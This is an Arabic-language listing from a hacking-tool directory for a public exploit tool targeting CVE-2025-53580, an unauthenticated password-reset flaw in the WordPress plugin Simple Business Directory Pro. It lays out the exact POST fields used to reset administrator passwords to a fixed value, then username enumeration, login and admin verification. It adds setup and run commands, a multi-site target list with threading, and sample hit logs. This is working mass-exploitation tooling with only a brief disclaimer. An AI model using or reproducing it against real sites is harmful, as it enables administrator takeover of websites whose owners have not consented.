Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-53580 — إصدارات إضافة WordPress Simple Business Directory Pro الأقدم من 15.6.9 معرّضة لثغرة تصعيد امتيازات ذات أولوية عالية. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-53580
تصعيد الامتيازاتالاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-53580

CVE-2025-53580

إصدارات إضافة WordPress Simple Business Directory Pro الأقدم من 15.6.9 معرّضة لثغرة تصعيد امتيازات ذات أولوية عالية.

4منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2025-53580

المكوّن الإضافي Simple Business Directory Pro الخاص بووردبريس < 15.6.9 معرّض لثغرة تصعيد صلاحيات عالية الأولوية.

CVE-2025-53580

Simple Business Directory Pro — تخصيص صلاحيات غير صحيح → إعادة تعيين كلمة المرور → الاستيلاء على حساب المدير

root@kitploit:~
   ___  _        ___     __  __  __  ____     ____ ___  ____ __   __
  / (_)(_|   |_// (_)   /  )/  \/  )|        |    /   \|    /  \ /  \
 |       |   |  \__       /|    | / |___     |___   __/|___ \__/|    |
 |       |   |  /   -----/ |    |/      \-----   \    \    \/  \|    |
  \___/   \_/   \___/   /___\__//___\___/    \___/\___/\___/\__/ \__/

CVE Plugin Auth Python Author


❶ الثغرة

السبب الجذري:
يكشف المكوّن الإضافي عن نموذج استعادة كلمة المرور في الواجهة الأمامية (qcpd-restore-pwd) الذي يقبل معرّفًا رقميًا qcpd-uid (معرّف مستخدم ووردبريس) وقيمة pass جديدة. لا يتم فرض أي مصادقة أو رمز token أو nonce أو تحقق عبر البريد الإلكتروني قبل تغيير كلمة المرور. يمكن لأي مهاجم غير مصادَق إعادة تعيين كلمة مرور المستخدم رقم 1 (عادةً مدير الموقع) وأي مستخدم آخر عبر إرسال طلب POST واحد فقط، ثم تسجيل الدخول بكلمة المرور المُحقَنة للحصول على وصول إداري كامل.


❷ سير الهجوم

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Discover SBD restore page                                   │
│     Probe 24 candidate paths  →  match body containing "sbd"   │
│                                                                 │
│  2. Reset passwords by user ID                                  │
│     POST <restore_url>                                          │
│       qcpd-restore-pwd      = restore                           │
│       qcpd-restore-pwd-type = user                              │
│       qcpd-uid              = 1  (then 2, then 3)              │
│       pass                  = NxploitedNX                       │
│                                                                 │
│  3. Enumerate usernames                                         │
│     /?author=1..9   →  redirect / body parse                    │
│     /wp-json/wp/v2/users  →  slug / username fields            │
│     hostname heuristic  +  "admin" fallback                     │
│                                                                 │
│  4. Login with injected password                                │
│     POST /wp-login.php  log=<user>  pwd=NxploitedNX             │
│     Check: wordpress_logged_in cookie present                   │
│                                                                 │
│  5. Verify admin access (dual method)                           │
│     GET /wp-json/wp/v2/users/me  →  capabilities.manage_options│
│     GET /wp-admin/users.php      →  adminmenu / users table     │
│                                                                 │
│  6. Write confirmed hit → Nx_sbd_login_hits.txt                 │
└─────────────────────────────────────────────────────────────────┘

❸ الإعداد

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

❹ الاستخدام

root@kitploit:~
python3 CVE-2025-53580.py

المطالبات

root@kitploit:~
Targets list file (one host/URL per line) [list.txt]:   list.txt
Threads (concurrent sites) [3]:                         5
HTTP timeout (seconds) [10]:                            10
Successful hits file [Nx_sbd_login_hits.txt]:           Nx_sbd_login_hits.txt

كلمة المرور المُحقَنة في جميع محاولات إعادة التعيين ثابتة داخليًا:

root@kitploit:~
NxploitedNX

معرّفات المستخدمين المستهدفة لكل موقع: 1، 2، 3 (قابلة للضبط عبر MAX_USER_ID)


❺ تنسيق الأهداف — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

❻ الصفحات المرشحة لـ SBD التي يتم فحصها

تفحص الأداة 24 مسارًا لكل هدف بحثًا عن صفحة يحتوي محتواها على sbd:

root@kitploit:~
/login          /log-in         /signin         /sign-in
/user-login     /account/login  /restore        /password-reset
/reset-password /lost-password  /lostpassword   /user/restore
/my-account     /members/login  /member-login   /customer-login
/wp-login.php   /blog/login     /auth/login     /auth/restore
/sbd-login      /sbd-restore    /blog/log-in    /account/log-in

❼ تعداد أسماء المستخدمين


❽ التحقق من صلاحيات المدير — طريقة مزدوجة

يتم التحقق من كل عملية تسجيل دخول ناجحة عبر فحصين مستقلين قبل كتابتها إلى القرص:

الطريقة 1 — REST API:

root@kitploit:~
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true  →  ADMIN CONFIRMED

الطريقة 2 — لوحة التحكم:

root@kitploit:~
GET /wp-admin/users.php
→ adminmenu / users table markers present  →  ADMIN CONFIRMED

❾ ملف الإخراج

Nx_sbd_login_hits.txt

root@kitploit:~
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)

[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)

❿ نموذج مخرجات الطرفية

root@kitploit:~
[info]  https://target.com :: starting
[ok]    https://target.com :: found front-end sbd page at https://target.com/my-account
[info]  https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info]  https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: extracting usernames and trying login
[ok]    https://target.com :: login OK for user='admin', checking admin...
[ok]    https://target.com :: HIT for user='admin' → admin=True,
        detail=ADMIN_CONFIRMED_REST(manage_options)

[warn]  https://target2.com :: no sbd page found in candidate restore paths, skipping

⓫ المؤلف

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


⓬ إخلاء المسؤولية

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · تم الإصلاح في 15.6.9

تنزيل الأداة
الحقلالتفاصيل
CVECVE-2025-53580
المكوّن الإضافيquantumcloud Simple Business Directory Pro (simple-business-directory-pro)
الإصدارات المتأثرةجميع الإصدارات < 15.6.9
المصادقةغير مطلوبة
النوعتخصيص صلاحيات غير صحيح → إعادة تعيين كلمة المرور بدون مصادقة
CWECWE-266 · تخصيص صلاحيات غير صحيح
الطريقةنقطة النهاية
إعادة توجيه المؤلف/?author=1 → /?author=9
REST API/wp-json/wp/v2/users → slug + username
الاستدلال من اسم المضيفأول مقطع من اسم النطاق
احتياطي مبرمجadmin مضمن دائمًا